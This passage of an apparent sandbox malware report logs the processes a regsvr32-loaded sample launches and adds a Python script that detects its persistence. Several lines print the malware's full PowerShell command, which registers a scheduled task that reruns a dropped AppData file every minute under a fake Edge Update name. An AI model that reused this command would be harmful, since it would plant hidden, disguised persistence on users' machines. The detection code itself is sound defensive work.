      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5aa590e8-e6d2-49ab-e5b8-6bcee32cf7c9}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\netapi32_1.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{5aa590e8-e6d2-49ab-e5b8-6bcee32cf7c9}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000391E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003685000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager*
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.0000000003970000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@
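      The PowerShell launches above are the persistence chain: regsvr32 first asks whether a scheduled task already runs `regsvr32 /S /i:SYNC ...\AppData\Roaming\netapi32_1.drv`, and if not registers one that fires every minute under a name copied from the Edge updater. Each piece of that chain is observable in ordinary process-creation telemetry (Sysmon Event ID 1 or Security 4688). The Python below is an added detection example, not code from the Joe Sandbox report or from the sample; it runs four checks over such events: regsvr32 spawning a script host, Register-ScheduledTask with a regsvr32 action, a regsvr32 target in a user-writable directory or with a non-COM extension, and a task name that imitates Edge Update while executing something other than MicrosoftEdgeUpdate.exe. The three regsvr32-to-powershell events are built from the command lines in this report; the two benign controls, the script-host set, the user-writable directory pattern and the COM extension list are constructed assumptions to tune for your own estate.

```python
"""Flag regsvr32 / scheduled-task persistence in process-creation telemetry.

Added example, not Joe Sandbox or sample code. Events are in the shape a
Sysmon Event ID 1 or Security 4688 record gives you: parent image, image,
command line. The regsvr32 -> powershell events are constructed from the
command lines in this report; the two benign controls are constructed too.
"""
import re
from dataclasses import dataclass
from ntpath import basename, splitext

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

# Assumptions to tune for your estate: script hosts regsvr32 should never spawn,
# directories an unprivileged user can write to, extensions a real COM server carries.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|users\\[^\\]+\\downloads|programdata|temp|public)\\", re.I)
COM_EXTENSIONS = {".dll", ".ocx", ".ax"}

# Pull a Register-ScheduledTask command line apart. Quotes may arrive escaped (\")
# because the whole script was handed to powershell as a single argument.
REGISTER_RE = re.compile(r"register-scheduledtask", re.I)
EXECUTE_RE = re.compile(r"-execute\s+\\?[\"']?(?P<exe>[^\s\\\"']+)", re.I)
ARGUMENT_RE = re.compile(r"-argument\s+\\?[\"'](?P<args>.*?)\\?[\"']\)", re.I)
TASKNAME_RE = re.compile(r"-taskname\s+[\"']?(?P<name>[^\"']+)", re.I)

def parse_regsvr32_args(args: str) -> dict:
    """Split a regsvr32 argument tail into switches, the /i: install string and the target file."""
    parsed = {"switches": [], "install": None, "target": None}
    for tok in re.findall(r'"[^"]*"|\S+', args):  # keep quoted paths with spaces whole
        low = tok.lower()
        if low.startswith(("/i:", "-i:")):
            parsed["install"] = tok[3:]  # string regsvr32 passes to the file's DllInstall export
        elif tok.startswith(("/", "-")) and len(tok) <= 3:
            parsed["switches"].append(low)
        else:
            parsed["target"] = tok.strip('"')
    return parsed

def regsvr32_target_findings(args: str) -> list:
    """Findings about what regsvr32 is being asked to load."""
    parsed = parse_regsvr32_args(args)
    target, out = parsed["target"], []
    if target is None:
        return out
    if USER_WRITABLE.search(target):
        out.append(f"regsvr32 target in user-writable path: {target}")
    if splitext(target)[1].lower() not in COM_EXTENSIONS:
        out.append(f"regsvr32 target has non-COM extension: {target}")
    if out and parsed["install"] is not None:  # context only when the target already looks wrong
        out.append(f"DllInstall invoked with argument {parsed['install']!r}")
    return out

def analyze(ev: ProcEvent) -> list:
    """Return the suspicious traits of one process-creation event (empty list if clean)."""
    parent, image, cl = basename(ev.parent_image).lower(), basename(ev.image).lower(), ev.command_line
    findings = []
    if parent == "regsvr32.exe" and image in SCRIPT_HOSTS:
        findings.append(f"regsvr32 spawned {image}")
    if image == "regsvr32.exe" and " " in cl:
        findings += regsvr32_target_findings(cl.split(None, 1)[1])
    if REGISTER_RE.search(cl):
        exe, arg, name = EXECUTE_RE.search(cl), ARGUMENT_RE.search(cl), TASKNAME_RE.search(cl)
        exe_name = basename(exe.group("exe")).lower() if exe else ""
        if exe_name.startswith("regsvr32"):
            findings.append("scheduled task whose action is regsvr32")
            if arg:
                findings += regsvr32_target_findings(arg.group("args"))
        # The genuine Edge updater task runs MicrosoftEdgeUpdate.exe, not a LOLBin.
        if name and "microsoftedgeupdate" in name.group("name").lower() \
                and not exe_name.startswith("microsoftedgeupdate"):
            findings.append(f"task name imitates Edge Update but runs {exe_name or '?'}")
    return findings

def scan(events) -> list:
    return [analyze(ev) for ev in events]  # index-aligned with the input

CHECK_CMD = r"""
powershell -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
""".strip()
REGISTER_CMD = r"""
powershell "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
""".strip()
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(REGSVR32, POWERSHELL, CHECK_CMD),             # report: does my task exist yet?
    ProcEvent(REGSVR32, POWERSHELL, REGISTER_CMD),          # report: create it
    ProcEvent(REGSVR32, POWERSHELL, REGISTER_CMD.lower()),  # report: lower-cased copy
    # constructed benign controls, not from the report
    ProcEvent(r"C:\Windows\System32\msiexec.exe", REGSVR32, r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe", POWERSHELL, r'powershell -Command "Get-ScheduledTask | Select-Object TaskName"'),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(basename(ev.image), "->", hits or "clean")
```

      The regsvr32-spawns-powershell rule fires on the existence check as well as on the registration, so a single event is enough to catch the chain even when the task is already in place. The `/i:` note is reported only once the target itself looks wrong, because DllInstall calls with an argument are common in legitimate installers.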
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
